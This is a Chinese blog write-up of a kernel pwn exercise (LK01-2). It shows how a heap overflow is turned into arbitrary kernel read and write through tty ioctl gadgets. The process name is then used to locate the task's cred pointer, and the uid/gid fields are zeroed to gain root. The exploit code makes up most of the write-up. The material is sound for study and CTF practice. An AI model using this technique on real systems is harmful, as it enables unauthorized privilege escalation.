通过篡改cred结构体实现提权利用

news2024/11/16 23:42:26

前言

在之前的HeapOverflow文章中,作者还构造了任意地址读写的操作,使用了任意地址读写去进行提权,还挺有意思的,记录一下如何利用任意地址读写进行提权。

作者利用任意地址读写分别改写modprobe_path以及cred结构体去实现提权的操作,由于改写modprobe_path的方法之前已经研究过了,因此现在详细记录一下如何修改cred结构体完成提权操作。

cred结构体

cred 结构体通常出现在UNIX/Linux操作系统内核中,用于表示进程的凭据(credentials)。这些凭据包括有关进程身份的信息,如用户ID、组ID、权限等。结构体部分成员如下

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
    ...
} __randomize_layout;

而我们在ret2usr的操作中,通常都为执行commit_creds(prepare_kernel_cred(0)),实际就是为了获取root的凭证,因此如果我们能过任意地址写的操作修改cred的结构体也同样能够实现。

cred的结构体存在uidgid等标识符用于标识在系统中用于身份验证和权限控制,因此将这些标识符修改为0,即可将当前进程修改为root进程。

那么该如何获取cred结构体的地址,则是提权的关键。这里就需要凭借任意地址读的操作。在task_struct中存在着cred结构体的指针值。并且该指针值刚好存在于comm变量的上方,而该变量用于存储当前的进程名。

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

#ifdef CONFIG_KEYS
	/* Cached requested key. */
	struct key			*cached_requested_key;
#endif

	/*
	 * executable name, excluding path.
	 *
	 * - normally initialized setup_new_exec()
	 * - access it with [gs]et_task_comm()
	 * - lock it with task_lock()
	 */
	char				comm[TASK_COMM_LEN];

因此我们可以通过将当前的进程名设置为在内核地址中几乎不会出现的值,则可以搜索内存值找到comm变量的位置,那么就可以获取cred结构体的指针值。

这里使用prctl函数设置进程名,prctl 函数是一个用于进程控制的系统调用,通常在Linux系统上可用。它允许你以不同的方式控制和查询进程的各种属性和行为。 prctl 函数的原型如下:

#include <sys/prctl.h>

int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);

prctl 函数是一个用于进程控制的系统调用,通常在Linux系统上可用。它允许你以不同的方式控制和查询进程的各种属性和行为。

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

prctl 函数的参数和行为取决于传递给它的 option 参数,以及可能的附加参数 arg2arg5。不同的 option 值对应于不同的控制操作。

以下是一些常见的 option 值和它们的用途:

  1. PR_SET_NAME:设置进程的名称,可以用于在系统中标识进程。
  2. PR_GET_NAME:获取进程的名称。
  3. PR_SET_PDEATHSIG:设置父进程退出时发送给子进程的信号。
  4. PR_GET_PDEATHSIG:获取父进程退出时发送给子进程的信号。
  5. PR_SET_SECCOMP:启用或禁用Seccomp过滤器,用于限制进程对系统调用的访问。
  6. PR_SET_KEEPCAPS:控制进程是否保留其有效用户ID的能力。
  7. PR_GET_KEEPCAPS:获取进程是否保留其有效用户ID的能力。
  8. PR_SET_NO_NEW_PRIVS:设置进程的No New Privileges标志,用于控制是否可以提升权限。
  9. PR_GET_NO_NEW_PRIVS:获取进程的No New Privileges标志状态。
  10. PR_SET_DUMPABLE:设置进程的核心转储状态。
  11. PR_GET_DUMPABLE:获取进程的核心转储状态。
  12. PR_SET_CHILD_SUBREAPER:设置进程是否作为子进程的子进程的领导者。
  13. PR_GET_CHILD_SUBREAPER:获取进程是否作为子进程的子进程的领导者。
ptrctl(PR_SET_NAME, "XXXXXXXXX"); //设置进程名

那么利用cred结构体的提权流程如下:

  • 具有任意地址读写的操作
  • 使用prctl函数将进程名设置为关键字
  • 使用任意地址在内核内存中搜索关键字,获取cred结构体的地址
  • 使用任意地址写修改cred结构体标识符的值,全修改为0

LK01-2

项目地址:https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-2/LK01-2/qemu/AAR%26AAW

题目的读写模块存在着堆溢出的漏洞,那么想要使用cred结构体进行提权,首先需要构造出任意地址读写的操作。

...
    *(unsigned long *)&buf[0x418] = g_buf;
    p[0xc] = 0xaaaaaa;
    write(fd, buf, 0x500);
    for (int i = 0; i < 100; i++) 
	ioctl(spray[i], 0x1234, 0x5678);
...

正如之前所说的,ioctl的参数是会传递给寄存器的,可以看到ioctl函数的参数对应RCXRSI寄存器,而第三个参数对应于RDX寄存器。并且距离g_buf地址的0xc的位置可以劫持程序的流程。

image-20230910212533727

那么在内核中搜索相关的gadget就可以构造出任意地址读写的操作。

任意地址读

这里需要注意的是ioctl函数的参数的字节长度是不同的,在执行ioctl(spray[i], 0x1122334455667788, 0x1122334455667788)时,我们同时往参数二与参数三写入0x1122334455667788的值,但是RCX寄存器值传入了4个字节,而RDX寄存器可以传入8个字节,因此我们需要将RDX寄存器作为地址,而RCX作为值,这是因为内核地址是占满八字节的。

image-20230910214715084

搜索的表达式为cat g | grep "mov .* \[rdx\];",由于需要rdx作为地址,因此直接搜索以rdx作为间接寻址的操作,括号需要进行转义字符。这里我们选取0xffffffff8118a285: mov eax, dword ptr [rdx]; ret;作为任意地址读的gadget,这是因为我们可以往rdx填入想要读取的地址并且eax通常用于存储返回值,因此直接读取返回值即可获得rdx指向的值。

image-20230910215249576

为了加速读取,作者这里采用缓存的形式,将能够控制的tty结构体的文件描述符存储起来,这样在下次读取时就不用重新遍历一遍。

//0xffffffff8118a285: mov eax, dword ptr [rdx]; ret;
int aar(unsigned long addr)
{  
    int result;
    *(unsigned long *)&buf[0x418] = g_buf;
    p[0xc] = kernel_base + op_aar;
    write(fd, buf, 0x500);
    if (cache_fd == -1)
    {
	    for (int i = 0; i < 100; i++) {
	       result = ioctl(spray[i], 0, addr);
	       if (result != -1)
	       {
	       	   cache_fd = spray[i];
		   return result;
	       }
	    }   
    }	
    else
    	return(result = ioctl(cache_fd, 0, addr));
}

任意地址写

任意地址写的gadget搜索思路与任意地址读一致,同样是将rdx作为寻址的寄存器,并且由于需要构造任意地址写,因此rcx寄存器则是我们想写入的值,因此搜索的表达式为cat g | grep "mov .* \[rdx\], rcx;"

image-20230910215914034

//0xffffffff810477f7: mov qword ptr [rdx], rcx; ret; 
void aaw(unsigned long target_addr, unsigned long data)
{
    *(unsigned long *)&buf[0x418] = g_buf;
    p[0xc] = kernel_base + op_aaw;
    write(fd, buf, 0x500);
    for (int i = 0; i < 100; i++) {
       ioctl(spray[i], target_addr, data);
    }   		
}

cred结构体的搜索与改写

首先是将当前进程名设置为一个关键字

prctl(PR_SET_NAME, "h0pe-ay!");

然后就是在内存中搜索该关键字,由于task_struct结构体存在于堆地址中,因此可以在堆地址中搜索。我们可以通过泄露的g_buf的地址,然后往前搜索,因为cred结构体会先于g_buf创建。这里需要注意的是需要将进程名改为小端,这里记录一下python从字符串转为16进制的脚本,因为每次都忘记了。

#从字符串转化为十六进制
>>> text = "h0pe-ay!"
>>> hex_string = text.encode('utf-8').hex()
>>> print(hex_string)
683070652d617921

#从十六进制转化为16进制
hex_string = "65703068"
bytes_obj = bytes.fromhex(hex_string)
print(bytes_obj)

接下来就是搜索内存了,需要注意以下几点

  • 使用小端序进行比较
  • 需要从g_buf地址往前搜索
  • 由于每次只能泄露4字节数据,因此需要泄露两次

在成功搜索到关键字之后,comm的上方四字节则是用于存储cred结构体的指针,因此需要通过任意地址去读取指针值,同样的由于只能读取四字节,因此需要读取两次,然后使用简单的移位组合起来。

    for (unsigned long addr = g_buf - 0x1000000;; addr += 0x8)
    {
    	if (aar(addr) == 0x65703068 && aar(addr+4) == 0x2179612d)
    	{
    		printf("[+] found!\n");
    		printf("addr:0x%lx\n", addr);
    		cred_addr = aar(addr - 4);
    		cred_addr = (cred_addr << 32) | aar(addr - 8);
    		printf("cred_addr:0x%lx\n", cred_addr);
    		break;
    	}
    }

最后就是改写cred结构体了,只需要将所有标识符修改为0即可,接着拿shell即可

    for (int i = 1; i < 9; i++)
    	aaw(0, cred_addr + i*4);

image-20230910223301496

完整exp可见https://github.com/h0pe-ay/Kernel-Pwn/blob/master/LK01-2/LK01-2/qemu/AAR%26AAW/exp.c

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1012301.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

JavaEE初阶(5)多线程案例(定时器、标准库中的定时器、实现定时器、线程池、标准库中的线程池、实现线程池)

接上次博客&#xff1a;JavaEE初阶&#xff08;4&#xff09;&#xff08;线程的状态、线程安全、synchronized、volatile、wait 和 notify、多线程的代码案例&#xff1a;单例模式——饿汉懒汉、阻塞队列&#xff09;_di-Dora的博客-CSDN博客 目录 多线程案例 定时器 标准…

Go语言在人工智能时代的崭露头角:为何越来越多公司选择使用Go语言?

&#x1f337;&#x1f341; 博主猫头虎 带您 Go to Golang Language.✨✨&#x1f341; &#x1f984; 博客首页——猫头虎的博客&#x1f390; &#x1f433;《面试题大全专栏》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1…

ABB机器人常用指令功能说明

ABB机器人常用指令功能说明 一、 程序控制 程序的调用 例行程序内的逻辑控制 停止程序执行 二、 变量指令 变量指令主要用于以下方面:  对数据进行赋值  等待指令  注释指令  程序模块控制指令 赋值指令 等待指令

STViT-R 代码阅读记录

目录 一、SwinTransformer 1、原理 2、代码 二、STViT-R 1、中心思想 2、代码与原文 本次不做具体的训练。只是看代码。所以只需搭建它的网络&#xff0c;执行一次前向传播即可。 一、SwinTransformer 1、原理 主要思想&#xff0c;将token按区域划分成窗口&#xff0c…

“批量剪辑,统一视频封面,让你的创作更高效!“

作为一个创作者&#xff0c;你是否经常为每个视频封面而烦恼&#xff1f;使用我们的批量剪辑功能&#xff0c;轻松统一视频封面&#xff0c;让你的创作更高效&#xff01; 首先&#xff0c;我们要进入媒体梦工厂主页面&#xff0c;并在主页面的板块栏里选择“视频封面”板块 第…

运维面试宝典

【Linux基础篇】 1.描述Linux运行级别0-6的各自含义 0 &#xff1a;关机模式 1 &#xff1a;单用户模式 < 破解 root 密码 2 &#xff1a;无网络支持的多用户模式 3 &#xff1a;有网络支持的多用户模式&#xff08;文本模式&#xff0c;工作中最常用的模式&#xff09;…

大数据时代元数据的重要性

元数据&#xff0c;是描述了数据本身&#xff08;如数据库、数据元素、数据模型&#xff09;&#xff0c;数据表示的概念&#xff08;如业务流程、应用系统、软件代码、技术基础设施&#xff0c;数据与概念之间的联系。元数据可以帮助组织理解其自身的数据、系统和流程&#xf…

【数据结构初阶】三、 线性表里的链表(无头+单向+非循环链表)

相关代码gitee自取&#xff1a; C语言学习日记: 加油努力 (gitee.com) 接上期&#xff1a; 【数据结构初阶】二、 线性表里的顺序表_高高的胖子的博客-CSDN博客 引言 通过上期对顺序表的介绍和使用 我们可以知道顺序表有以下优点和缺点&#xff1a; 顺序表优点 尾插 和 尾…

SpringBoot接受请求参数

1.简单参数 1.1原始方法 说明&#xff1a;获取请求传来的name参数&#xff0c;age参数的值。 //简单方式 RestController public class RequestController {GetMapping("/books")public String simpleParam(HttpServletRequest request) {//获取请求参数 name和ag…

推荐国产低功耗20位分辨率模数转换器

RAMSUN提供的类比精密、低功耗、20位分辨率、兼容SPI的模数转换器(ADC)。采用QFN-10和MSOP-10两种封装形式&#xff0c;集成了低漂移电压基准&#xff0c;振荡器&#xff0c;可编程增益放大器(PGA)&#xff0c;抗工频干扰滤波器和数字比较器等功能模块&#xff0c;以简化系统设…

微信公众号怎么添加抢福袋抽奖活动

在微信公众号中添加抢福袋抽奖活动&#xff0c;可以增加用户互动和粘性&#xff0c;同时也能为公众号带来更多的流量和曝光度。下面将从以下几个方面详细阐述在微信公众号中如何添加抢福袋抽奖活动。 一、活动策划 在策划活动之前&#xff0c;需要明确活动的目的和目标用户&am…

接口测试入门

1. 什么是接口测试 顾名思义&#xff0c;接口测试是对系统或组件之间的接口进行测试&#xff0c;主要是校验数据的交换&#xff0c;传递和控制管理过程&#xff0c;以及相互逻辑依赖关系。其中接口协议分为HTTP,WebService,Dubbo,Thrift,Socket等类型&#xff0c;测试类型又主要…

ITR服务体系的常见问题和华为构建ITR的经验分享

大家好&#xff01; 前两天有一个企业负责客户服务、售后部门的朋友和华研荟探讨&#xff0c;企业的服务体系如何搭建&#xff0c;以及如何像华为一样构建ITR流程 他的苦恼是&#xff0c;自己所带领的部门叫做客户服务中心&#xff0c;但是在公司内部不受重视&#xff0c;公司…

如何将文件或者图片压缩成zip文件压缩包

代码&#xff1a; RestController RequestMapping("/download") public class DownloadController {GetMapping("/studentWork")public ResponseEntity<StreamingResponseBody> downloadStudentWork() {HttpHeaders headers new HttpHeaders();hea…

仔仔细细的给您讲,如何建立数据仓库

数据仓库的定位 在整个数据价值生产链路中&#xff0c;数据仓库的主要作用就是中心化分发&#xff0c;将原始数据与数据价值挖掘活动隔离。所有的原始数据都会进入数据仓库&#xff0c;再由数据仓库统一分发给下游的数据使用者。这样的结构实现了原始数据与数据分析工作的解耦…

Linux 企业级夜莺监控分析工具远程访问

目录 前言 1. Linux 部署Nightingale 2. 本地访问测试 3. Linux 安装cpolar 4. 配置Nightingale公网访问地址 5. 公网远程访问Nightingale管理界面 6. 固定Nightingale公网地址 前言 夜莺监控是一款开源云原生观测分析工具&#xff0c;采用 All-in-One 的设计理念&…

xml配置文件密码特殊字符处理

错误姿势&#xff1a; 正确姿势&#xff1a;采取转义符的方式 常用转义符&#xff1a;

位图和布隆过滤器的实现

前言 位图和布隆过滤器是基于哈希思想实现的数据结构&#xff0c;他们在很多的方面都有应用&#xff0c;比如&#xff1a;操作系统中的磁盘标记&#xff0c;快速查找某个数据是否在集合中。布隆过滤器可以高效的进行插入和查询&#xff0c;可以告诉你“某样东西一定不存在或者可…

Sui Gaming AMA精彩内容集锦

9月8日&#xff0c;Sui基金会在Twitter Space举办了一场「游戏」主题的AMA&#xff0c;会议由基金会市场团队的Rainier主持&#xff0c;邀请了Coert Voorhees、Anthony Palma和Bill Allred三位嘉宾分享观点。Coert Voorhees是Arden的联合创始人兼首席执行官&#xff0c;其产品为…

微信小程序——使用 Vant 组件实现 Popup 弹出层(各位置弹出详细代码分享)

✅作者简介&#xff1a;2022年博客新星 第八。热爱国学的Java后端开发者&#xff0c;修心和技术同步精进。 &#x1f34e;个人主页&#xff1a;Java Fans的博客 &#x1f34a;个人信条&#xff1a;不迁怒&#xff0c;不贰过。小知识&#xff0c;大智慧。 &#x1f49e;当前专栏…